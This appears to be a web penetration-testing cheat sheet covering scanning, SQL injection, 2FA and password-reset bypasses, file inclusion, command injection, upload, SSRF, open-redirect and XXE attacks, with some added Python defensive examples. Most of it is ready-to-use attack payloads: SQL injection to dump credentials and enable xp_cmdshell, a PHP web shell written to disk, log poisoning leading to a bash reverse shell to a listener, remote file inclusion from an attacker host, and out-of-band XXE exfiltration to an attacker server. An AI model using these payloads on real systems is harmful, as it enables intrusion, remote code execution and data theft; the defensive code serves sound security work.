80, 443, 8080 and 8443 (HTTP and HTTPS) | - Cross-site Scripting (XSS) - SQL injections - Cross-Site Request Forgeries (CSRF) - DDoS |
1433,1434 and 3306 (SQL Server and MySQL) | - Default configurations - DDoS |
3389 (Remote Desktop) | - BlueKeep - Leaked or weak user authentication |
8090 (Confluence) | CVE-2022-26134 |
- Search for known dangerous functions used on user-supplied input
  - example, `eval(` can cause command injection without proper sanitization
- Search for hardcoded credentials such as API keys, encryption keys and database passwords
  - many API keys start with the same format (ex. AWS keys usually start with `AKIA`), search for patterns from ServletTarPit.java, Tarpit Java
- Search for weak cryptography or hashing algorithms
- Search for outdated dependencies
- Search for revealing comments
Digging deeper
- Prioritize functions like authentication, authorization, PII etc.
- example: disclosing PII in the logs, from OrderStatus.java
- example: SQL injection in OrderStatus.java
- Follow any code that deals with user input
Automation
- Use SAST tools
- Use SCA tools
- Use secret scanners
- Then test the results manually
Resources
- How to Analyze Code for Vulnerabilities
- OWASP Code Review Guide
- Tarpit Java
- TruffleHog
- GitLeaks
- Visual Studio Code for Source Code Analysis
- beautifier.io for JavaScript Analysis
Run Nessus and navigate to http://localhost:8834
Defining targets
Top-right, click "New Scan"
- Basic Network Scan: general scan containing a number of tests that may be used against different target types
- Arguments: a name for the scan and a list of targets (an IP address, an IP range, or comma-delimited FQDN or IP list)
- Credentialed Patch Audit: authenticated scan that enumerates missing patches
- Web Application Tests: specialized scan for locating published Web application security vulnerabilities
- Spectre and Meltdown: targeted scan for Meltdown and Spectre vulnerabilities
Configuring scan definitions
- Ports to scan
- In "Discovery" > "Scan Type" you can change the ports to scan
- "Discovery" > "Port Scanning" to select more specific options
- Turn off Host discovery (save time and scan more quietly)
- "Discovery" > "Host Discovery" under the "Settings" tab > deselect "Ping the remote host"
Authenticated scanning
From a new scan, click in the "Credentials" tab.
Scanning with Individual Nessus Plugins
From the "Plugins tab" you can select multiple options (a family of plugin) in the left column or one by one in the right column.
NSE scripts can be found in the `/usr/share/nmap/scripts/` directory. Here you can find `script.db`, a file that serves as an index to all of the scripts.
- Check also: CVE-2021-41773 NSE Script: `sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" <IP>`
How to add new scripts
- Copy the file in `/usr/share/nmap/scripts/`
- `sudo nmap --script-updatedb`
Grep for scripts in the "vuln" and "exploit" categories
cat script.db | grep '"vuln"\|"exploit"'
Using NSE's "vuln" scripts
sudo nmap --script vuln <IP>
You can find it here: sullo/nikto.
An example of usage
nikto -host=http://www.targetcorp.com -maxtime=30s
You can find it here: projectdiscovery/nuclei. See also: "The Ultimate Guide to Finding Bugs With Nuclei by ProjectDiscovery"
Automatic Selection
nuclei -u http://target.io -as
Check for Technologies
%USERPROFILE%\nuclei-templates\technologies
Check for more: misconfiguration, CVEs and CNVD
-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
Use it in a workflow
cat subdomains.txt | httpx | nuclei -t technologies
Use tags combined with automatic selection
nuclei -l list.txt -as -tags log4j -o output.txt
Check for: takeovers, .git exposed, crlf-injection, swaggers, exposed panels and old copyrights
nuclei -l target.txt -t %USERPROFILE%/nuclei-templates/takeovers -t %USERPROFILE%/nuclei-templates/exposures/configs/git-config.yaml -t %USERPROFILE%/nuclei-templates/vulnerabilities/generic/crlf-injection.yaml -t %USERPROFILE%/nuclei-templates/exposures/apis/swagger-api.yaml -t %USERPROFILE%/nuclei-templates/exposed-panels -t %USERPROFILE%/nuclei-templates/miscellaneous/old-copyright.yaml -stats -o output/nuclei_target
Check for log4j
nuclei -l target.txt -as -tags log4j,cve -stats -o output/nuclei_2_target
Tools
- SQL injection cheat sheet | PortSwigger
- SQL Injection cheat sheets | pentestmonkey
- sqlmapproject/sqlmap
- Ghauri
MySQL
- `mysql -u root -p'root' -h <IP> -P 3306` connect to the database
- `select version();` retrieve the db version
- `select system_user();` inspect the current session's user
- `show databases;` list all available databases
- `USE databasetmp` use the `databasetmp` database
- `SHOW TABLES`
- `SELECT user, authentication_string FROM mysql.user WHERE user = 'rooter';` inspect user `rooter`'s encrypted password
MSSQL
- `impacket-mssqlclient <user>:<password>@<IP> -windows-auth` connect to a remote instance via Impacket
- `SELECT @@version;` retrieve the db version
- `SELECT name FROM sys.databases;` list all available databases
- `SELECT * FROM tempdb.information_schema.tables;` inspect the available tables in the `tempdb` database
- `SELECT * from tempdb.dbo.users;`
How to identify SQL injections
- Search for SQL errors, use the apostrophe or the backtick character in parameters and analyze the response.
Error-based payloads
- Try to generate an error using characters like `'` or the backtick
- Try this payload: `' OR 1=1 -- //`
UNION-based payloads
- `' ORDER BY <NUMBER>-- //` verify the exact number of columns
  - increment the `<NUMBER>` value from `1` to `..` until you reach an error like `Unknown column '7' in 'table'`
  - check this
- `' UNION SELECT database(), user(), @@version, null, null -- //` enumerate the database via SQL UNION injection
  - use `null` to have the correct number of columns
Blind SQL injections detection
- `0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z`
- `0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z`
- `0'or(now()=sysdate()&&SLEEP(1))or'Z`
Extract database information
- Extract the version: `?id=1 union all select 1, 2, @@version`
- Extract the database user: `?id=1 union all select 1, 2, user()`
- Extract table names: `?id=1 union all select 1, 2, table_name from information_schema.tables`
- Extract table columns: `?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'`
- An example of extracting the `users` table: `?id=1 union all select 1, username, password from users`
Authentication Bypass
`tom' or 1=1 LIMIT 1;#`
- `#` is a comment marker in MySQL/MariaDB
- `LIMIT 1` is to return a fixed number of rows and avoid errors when our payload is returning multiple rows
Insert a new user
`insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");`
Local File Inclusion (LFI)
Using the `load_file` function: `?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')`
Remote Code Execution (RCE)
- `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'COMMAND';`
- `EXEC sp_configure 'allow updates', 0 RECONFIGURE EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell', 1 GO RECONFIGURE GO xp_cmdshell 'COMMAND';`
- Write a PHP shell using the `OUTFILE` function: `?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'`. Then access `backdoor.php&cmd=ipconfig`.
sqlmap
- `sqlmap -u https://vulnerable/index.php?id=1 -l --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3 --force-ssl --threads 5 --level 1 --risk 1 --tamper=space2comment` (`-l` to parse a Burp log file)
- `sqlmap -u http://victim/page.php?param=1 -p param` test the parameter `param`
- `sqlmap -u http://victim/page.php?param=1 -p param --dump` dump the entire database
  - Add `-D DATABASE_NAME` and `-T TABLE_NAME` to dump a specific database/table
- `sqlmap -r request.txt -p param --os-shell` gain shell
- `sqlmap -u http://vulnerable.com --forms --crawl=10 --level=5 --risk=3` to crawl
- `sqlmap -u http://vulnerable.com --batch` non interactive mode
How to fix SQL injections: Use parameterized queries/prepared statements to protect against SQL injections by isolating user input from SQL code. They add placeholders for user input in SQL statements, creating a layer of isolation and preventing user input from affecting SQL code.
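The parameterized-query fix, as an added Python example that is not part of the original notes: it runs the `' OR 1=1 -- //` payload from above against a string-built login query and against a parameterized one, using an in-memory SQLite database with constructed rows instead of MySQL (so the `-- //` comment form applies, the MySQL `#` form does not).

```python
"""Vulnerable string-built login query beside its parameterized fix,
run against an in-memory SQLite database so it works offline.

Added example, not part of the original notes. The users table and its
rows are constructed for the demo.
"""
import sqlite3


def make_db():
    """Create the constructed users table used by the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("tom", "s3cret-tom"), ("alice", "s3cret-alice")],  # constructed data
    )
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL grammar.
    Returns the matched username or None."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values separately from the
    SQL text, so quotes and comment markers in the input are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The error-based payload from the notes, used as the username with a wrong password.
PAYLOAD = "' OR 1=1 -- //"


def demo():
    """Run both variants and return (vulnerable, safe, safe_with_real_creds)."""
    db = make_db()
    return (
        login_vulnerable(db, PAYLOAD, "wrong"),   # 'tom': the comment eats the password check
        login_safe(db, PAYLOAD, "wrong"),         # None: no user is literally named "' OR 1=1 -- //"
        login_safe(db, "tom", "s3cret-tom"),      # 'tom': legitimate login still works
    )


if __name__ == "__main__":
    vulnerable, safe, real = demo()
    print("vulnerable query with payload:", vulnerable)
    print("parameterized query with payload:", safe)
    print("parameterized query, real credentials:", real)
```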
Multi-factor authentication
- Response manipulation, try to intercept the response and modify the status to `200`
- Status code manipulation, change the code from `4xx` to `200`
- 2FA code leakage in the response
- JS File Analysis
- 2FA Code Reusability
- Lack of Bruteforce protection
- The 2FA code can be used for any user
- CSRF on 2FA disabling
- Password reset disable 2FA
- Bypass 2FA with null or `000000`
- Access the content directly
- Login with Oauth to bypass 2FA
- If you get logged-out after failed attempts, use macros with Burp
Password reset
- Change the `Host` with the host of your server. The request for a password reset might use the `Host` value for the link with the reset token
- Try with headers like `X-Forwarded-Host:`
- Via dangling markup: `Host: victim.com:'<a href="//attacker.com/?`
- Insert two emails, like:
Rate-limit
- Bypass with `X-Forwarded-For:127.0.0.1-1000`
- IP rotating, you can use
- Log in into a valid account to reset the rate-limit
Web Cache Deception
- The attacker sends the victim a 404 endpoint like `site.com/dir/ok.css`
- The victim clicks on it, and the CDN caches the page
- The attacker goes to `site.com/dir/ok.css` and can now see the victim's page
Misc tests
- Password change
- Keeping users logged in
- Test "remember me" functionality
- PHP protections can be bypassed with `[]`, like `password=123` to `password[]=123`
- Replace password with a list of candidates, example `"username":"usertest" "password":[ "123456", "password", "qwerty", ...`
- Search for Open Redirect in login and register
- For phpMyAdmin, check default credential `root` and blank password
Directory traversal vulnerabilities allow an attacker to read local secret files. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like `file`, `path` and `folder` (see scripts/fg.rb)
Exploitations / Bypasses
- simple case: `https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini`
- absolute path: `https://insecure-website.com/loadImage?filename=/etc/passwd`
- stripped non-recursively: `https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd`
- superfluous URL-decode: `https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd`
- validation of start of path: `https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd`
- validation of file extension (null byte): `https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png`
Search for
- `windows\win.ini`
- `c:\windows\system32\drivers\etc\hosts`
- `etc/passwd`
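A validator that handles each of the bypasses above, as an added Python example that is not part of the original notes; the base directory `/var/www/images` is taken from the notes, the naive `../`-stripping "before" is shown only to explain the `....//` payload, and nothing is read from disk.

```python
"""Hardened filename handling for a 'loadImage?filename=' style endpoint.

Added example, not part of the original notes. BASE_DIR is assumed from
the notes; paths are only normalised as strings, nothing is opened.
"""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/images"


def naive_sanitize(user_filename):
    """The 'before': one non-recursive strip of '../'. Shown only because it
    is what turns '....//' into '../'; do not use this."""
    return user_filename.replace("../", "")


def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding (defeats ..%252f) without looping forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of URL-encoding")


def safe_image_path(user_filename):
    """Return an absolute path inside BASE_DIR or raise ValueError.

    Order matters: decode first, then reject null bytes, then normalise,
    and only then compare the prefix. Checking the prefix on the raw input
    is what the '/var/www/images/../../../etc/passwd' bypass exploits.
    """
    name = fully_decode(user_filename)
    if "\x00" in name:                      # %00.png extension-check bypass
        raise ValueError("null byte in filename")
    name = name.replace("\\", "/")          # treat Windows separators like '/'
    if name.startswith("/"):                # absolute paths are never valid here
        raise ValueError("absolute path not allowed")
    # normpath collapses every '../' after joining. Note that '....//' is only
    # dangerous after a naive strip: as a path it is the harmless directory
    # name '....' and stays inside BASE_DIR (it simply will not exist).
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, name))
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        raise ValueError("path escapes base directory")
    # In a real service also resolve symlinks (os.path.realpath) before serving.
    return candidate


def is_allowed(user_filename):
    """True if safe_image_path accepts the name, False if it rejects it."""
    try:
        safe_image_path(user_filename)
        return True
    except ValueError:
        return False


# The bypass payloads from the notes above (filename parameter only).
BYPASS_PAYLOADS = [
    r"..\..\..\windows\win.ini",
    "/etc/passwd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
]

if __name__ == "__main__":
    print("naive strip of '....//' payload ->", naive_sanitize(BYPASS_PAYLOADS[2]))
    for p in BYPASS_PAYLOADS:
        print(f"{p!r:45} allowed={is_allowed(p)}")
    print(safe_image_path("cats/kitten.png"))      # /var/www/images/cats/kitten.png
```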
File inclusion vulnerabilities allow an attacker to include a file into the application's running code. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like `file`, `path` and `folder` (see scripts/fg.rb).
Local File Inclusion (LFI): execute a local file. An example: Apache's access.log contamination
- Once you have found a LFI, read Apache's access.log: `http://victim.com/page.php?file=<PAYLOAD>`
  - Use `C:\xampp\apache\logs\access.log` or `../../../../../../../../../var/log/apache2/access.log`
- Notice which values from requests are saved. Contaminate Apache logs by sending this payload `<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>` in the User-Agent
- Execute a RCE with `http://victim.com/page.php?file=<apache/access.log>&cmd=ipconfig`. It will load the contaminated logs and perform an RCE thanks to `shell_exec($_GET['cmd'])`
- Run a reverse shell using a listener `nc -nvlp 4444` and in `&cmd` use `bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22`
Remote File Inclusion (RFI): execute a remote file
- An example: `http://<VICTIM>/menu.php?file=http://<ATTACKER>/evil.php`
PHP Wrappers
- `?file=data:text/plain,hello world`
- `?file=data:text/plain,<?php echo shell_exec("dir") ?>`
- `?file=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls`
- Use the command `curl http://victim.com/index.php?page=php://filter/convert.base64-encode/resource=admin.php` to obtain the source code of `admin.php` encoded in base64. This way the PHP is not executed and the source code is fetched instead
- Some examples for `php://`: PHP: php:// - Manual
- Other wrappers
To search
/var/log/apache2/access.log
/etc/passwd
/etc/shadow
OS Command Injection
Let's say that the vulnerable endpoint is `https://insecure-website.com/stockStatus?productID=381&storeID=29`. To provide the stock information, the application runs the command `stockpile.pl 381 29`. If there is no OS Command Injection protection, by inserting the payload `& echo abcdefg &` in `productID` it's possible to execute the command `echo`.
For blind OS Command Injections
- Time delay
& ping -c 10 127.0.0.1 &
- Redirecting output
& whoami > /var/www/static/whoami.txt &
- Out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
Ways of injecting OS commands
- Both Windows and Unix-based systems
&
&&
|
||
- Unix-based systems only
;
- Newline with `0x0a` or `\n`
- `` `injected command` ``
- `$(injected command)`
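As an added example (not code from this page), the Python below reconstructs the `stockpile.pl` call in the injectable shape, runs the `& echo abcdefg &` payload through `/bin/sh` to show the separator being honoured, and contrasts it with an argv-list plus allowlist version in which there is no shell to interpret any of the separators listed above; `stockpile.pl` does not need to exist for the demonstration:

```python
import re
import subprocess

# Shell metacharacters from the list above, plus backtick and $() substitution.
SEPARATORS = re.compile(r"(\|\||&&|[|&;\n`]|\$\()")


def vulnerable_stock_check(product_id, store_id):
    """String-built command run through the shell (hypothetical reconstruction
    of the back end above): `& echo abcdefg &` in product_id makes /bin/sh run
    echo next to the intended program."""
    cmd = "stockpile.pl %s %s" % (product_id, store_id)
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=10)
    return result.stdout


def injected_tokens(value):
    """Metacharacters present in a value: handy when triaging logs or inputs."""
    return [m.group(0) for m in SEPARATORS.finditer(value)]


def validate_id(value):
    """Allowlist: both arguments are numeric IDs, so accept digits only.
    Denylisting the separators above is the weaker option (encodings, newlines)."""
    if not re.fullmatch(r"\d{1,10}", value):
        raise ValueError("invalid id: %r" % value)
    return value


def hardened_argv(product_id, store_id):
    """Validate both inputs and build an argv list: with shell=False the values
    reach the program as single arguments, never as shell syntax."""
    return ["stockpile.pl", validate_id(product_id), validate_id(store_id)]


def hardened_stock_check(product_id, store_id):
    result = subprocess.run(hardened_argv(product_id, store_id), shell=False,
                            capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    payload = "381 & echo abcdefg &"
    print("tokens:", injected_tokens(payload))
    print("vulnerable stdout:", repr(vulnerable_stock_check(payload, "29")))
    try:
        hardened_stock_check(payload, "29")
    except ValueError as err:
        print("hardened refused:", err)
```

For the blind cases, the same separation holds: `& ping -c 10 127.0.0.1 &` only works because the string reaches a shell; an argv list makes the whole payload a single, unparsed argument.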
Resource
Examples
- Excessive trust in client-side controls
- 2FA broken logic
- Failing to handle unconventional input
- Inconsistent security controls
- Weak isolation on dual-use endpoint
- Password reset broken logic
- Insufficient workflow validation
- Flawed enforcement of business rules
- Authentication bypass via encryption oracle
- Account Takeover via type confusion
- Play with parameters and flags to see if you can achieve ATO
What is information disclosure?
- Data about other users, such as usernames or financial information
- Sensitive commercial or business data
- Technical details about the website and its infrastructure
What are some examples of information disclosure?
- Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
- If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [Reference]
How do information disclosure vulnerabilities arise?
- Failure to remove internal content from public content
- Insecure configuration of the website and related technologies
- Flawed design and behavior of the application
In the context of web applications, access control is dependent on authentication and session management:
- Authentication identifies the user and confirms that they are who they say they are;
- Session management identifies which subsequent HTTP requests are being made by that same user;
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
From a user perspective, access controls can be divided into the following categories:
- Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
- Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
- Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it
Tools
- Autorize
- Authz
- UUID Detector
- Check also endpoints in JS files
Upload Functions check-list
- Check if the method `PUT` is enabled
- Integrations (from 3rd party)
  - XSS
- Self Uploads
  - XML based (Docs/PDF)
    - SSRF, XSS
  - Image
    - XSS, Shell
    - Name
    - Binary header
    - Metadata
- Where is data stored?
Extension Splitting
- shell.php%00.png
- shell.php%0A.png
- shell.php\n.png
- shell.php\u000a.png
- shell.php\u560a.png
- shell.php%E5%98%8A.png
- shell.php;.png
- shell.php%3B.png
- shell.php\u003b.png
- shell.php\u563b.png
- shell.php%E5%98%BB.png
multipart/form-data POST request
```http
POST / HTTP/2
Host: example.io
Content-Type: multipart/form-data; boundary=---------------------------374598703146120535182333328
Content-Length: 342

-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="key"

general
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="file"; filename="file.pdf"
Content-Type: application/pdf

$content$
-----------------------------374598703146120535182333328--
```
Add magic bytes
Add magic bytes at the beginning of a file to bypass restrictions
```bash
echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >> reverse.php.png
cat reverse.php >> reverse.php.png
```
- Useful, for example, to upload `.js` files and bypass CSP restrictions
General tips
- If the target creates an encrypted URL for your file, copy the domain and use the command `echo data.target.com | waybackurls | httpx -mc 200,403`. If you find valid endpoints, it might be possible to have an information disclosure [Reference]
Resources
- Common MIME types
- ASHX shell, see mert's tweet
- How I earned $500 by uploading a file: write-up of one of my first bug bounty
- See the shells here
SSRF with blacklist-based input filters bypass
Some applications block input containing hostnames like `127.0.0.1` and `localhost`, or sensitive URLs like `/admin`. In this situation, you can often circumvent the filter using various techniques:
- Using an alternative IP representation of `127.0.0.1`, such as `2130706433`, `017700000001`, or `127.1`
- Registering your own domain name that resolves to `127.0.0.1`. You can use spoofed.burpcollaborator.net for this purpose, or the domain firefox.fr, which points to `127.0.0.1`
- Obfuscating blocked strings using URL encoding or case variation
SSRF with whitelist-based input filters bypass
- You can embed credentials in a URL before the hostname, using the `@` character. For example: `https://expected-host@evil-host`
- You can use the `#` character to indicate a URL fragment. For example: `https://evil-host#expected-host`
- You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: `https://expected-host.evil-host`
- You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can use combinations of these techniques together.
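The bypasses above work because the filter and the HTTP client parse the URL differently. As an added example (not code from this page), the Python below contrasts a substring check with a real URL parse, normalises the alternative spellings of `127.0.0.1` with `inet_aton`, and shows an allowlist check that also validates the address the name resolves to; `expected-host` and `evil-host` are the placeholders from the list above and the DNS resolver is injectable so the code runs offline:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist: the only host the application should fetch from.
ALLOWED_HOSTS = {"expected-host"}

# Ranges an SSRF filter should never let the server reach: loopback, RFC 1918,
# link-local (the 169.254.169.254 metadata endpoint), 0.0.0.0/8 and the IPv6 equivalents.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]


def naive_allowed(url):
    """The flawed check that the @, # and subdomain tricks above defeat."""
    return any(host in url for host in ALLOWED_HOSTS)


def hostname_of(url):
    """Hostname as a real URL parser sees it: userinfo before '@', the
    fragment after '#' and the port are not part of the host."""
    return urlsplit(url).hostname or ""


def canonical_ip(host):
    """Collapse alternative IPv4 spellings (2130706433, 017700000001, 127.1)
    into dotted-quad form via the libc inet_aton rules; None for non-literals."""
    try:
        return str(ipaddress.IPv4Address(socket.inet_aton(host)))
    except (OSError, ValueError):
        try:
            return str(ipaddress.ip_address(host.strip("[]")))
        except ValueError:
            return None


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETS)


def blocked_by_ip(url, resolve=socket.gethostbyname):
    """Denylist mode: canonicalise literals, resolve names, then check the range.
    This is what catches a registered domain that resolves to 127.0.0.1."""
    host = hostname_of(url)
    ip = canonical_ip(host) or resolve(host)
    return is_internal(ip)


def safe_target(url, resolve=socket.gethostbyname):
    """Allowlist mode: match the parsed hostname exactly, then check the address
    it resolves to. The client must connect to this resolved address rather
    than resolve again, or DNS rebinding re-opens the window."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS:
        return False
    ip = canonical_ip(host) or resolve(host)
    return not is_internal(ip)


if __name__ == "__main__":
    for u in ("https://expected-host@evil-host", "https://evil-host#expected-host",
              "https://expected-host.evil-host", "http://2130706433/admin"):
        print("%-35s naive=%s parsed-host=%s" % (u, naive_allowed(u), hostname_of(u)))
```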
Other tips
- By combining it with an Open redirection, you can bypass some restrictions. An example:
http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
- For AWS, bypass some restrictions by hosting this PHP page [Reference]: `<?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>`
- If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
- SSRF (Server Side Request Forgery) testing resources
Common endpoints
- Webhooks
- Try to send requests to internal resources
- PDF Generator
  - If there is an HTML Injection in a PDF generator, try to call internal resources with something like `<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">`, with the tags `<img>`, `<script>`, `<base>` or with the CSS function `url()`
- Document parsers
- If it's an XML doc, use the PDF Generator approach
- In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
- Link expansion, [Reference]
- File uploads
  - Instead of uploading a file, upload a URL. An example: use an SVG file
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/test.png"/>
</svg>
```
Common payloads
http://127.0.0.1
http://localhost/
http://169.254.169.254/
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
https://kubernetes.default.svc/metrics
[Random Robbie's tweet]
Resources
Bypasses
- https://attacker.com?victim.com
- https://attacker.com;victim.com
- https://attacker.com/victim.com/../victimPATH
- https://victim.com.attacker.com
- https://attackervictim.com
- https://victim.com@attacker.com
- https://attacker.com#victim.com
- https://attacker.com\.victim.com
- https://attacker.com/.victim.com
- https://subdomain.victim.com/r/redir?url=https%3A%2F%2Fvictim.com%40ATTACKER_WEBSITE.COM?x=subdomain.victim.com%2f
- https://www.victim.com/redir/r.php?redirectUri=https://attacker%E3%80%82com%23.victim.com/
- https://www.victim.com/redir/r.php?redirectUri=/%0d/attacker.com/
XXE injection
- Exploiting XXE to retrieve files. Original:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
```
  Modified:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```
- Exploiting XXE to perform SSRF attacks: `<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>`
- Exploiting blind XXE to exfiltrate data out-of-band. Example: `<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>`
- Exfiltrate data out-of-band. `malicious.dtd` hosted on the attacker's web server (inside an entity value the nested declaration's `%` must be written as `&#x25;`, while `%file;` is expanded as-is):
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://webattacker.com/?x=%file;'>">
%eval;
%exfil;
```
  Submit to the vulnerable server:
```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>
```
- Exploiting blind XXE to retrieve data via error messages (same hosting as above):
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```
- Exploiting blind XXE by repurposing a local DTD. Suppose there is a DTD file on the server filesystem at `/usr/local/app/schema.dtd` that defines and uses a parameter entity called `custom_entity`. Redefine it in the internal subset so that loading the local DTD executes your declarations (one extra level of escaping: `%` becomes `&#x25;`, and inside the inner literal `&` and `'` become `&#x26;` and `&#x27;`):
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```
  To find a DTD to repurpose, test for ones that commonly exist, for example `/usr/share/yelp/dtd/docbookx.dtd` on systems with the GNOME desktop:
```xml
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]>
```
- Try with XInclude to achieve SSRF or LFI
```xml
<?xml version="1.0" encoding="utf-8" ?>
<username xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///c:/windows/win.ini"/>
</username>
```
Attack surfaces
- XInclude attacks: `<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>`
- XXE attacks via file upload with `.svg`
```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
- XXE attacks via modified content type. For example, `Content-Type: application/x-www-form-urlencoded` -> `Content-Type: text/xml`
Manually testing for XXE vulnerabilities generally involves
- Testing for file retrieval
- Testing for blind XXE vulnerabilities
- Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document
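The DTD payloads above are easy to get wrong because the escaping of `%` changes with nesting depth. As an added example (not code from this page), the Python below generates the in-band, out-of-band, error-based and local-DTD variants with the right escaping for each context, plus a simple DOCTYPE/XInclude check for the defensive side; `webattacker.com` and the file paths are the placeholders from the examples above:

```python
import re

ATTACKER = "http://webattacker.com"  # constructed attacker host

# Anything declaring a DTD, an entity or an XInclude in a document that never needs one.
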